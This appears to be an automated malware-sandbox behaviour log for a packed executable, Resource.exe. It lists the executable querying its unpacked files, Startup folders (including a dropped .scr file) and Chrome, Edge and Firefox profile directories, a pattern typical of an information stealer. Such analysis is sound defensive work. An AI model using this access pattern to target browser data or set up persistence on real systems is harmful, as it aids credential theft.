Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
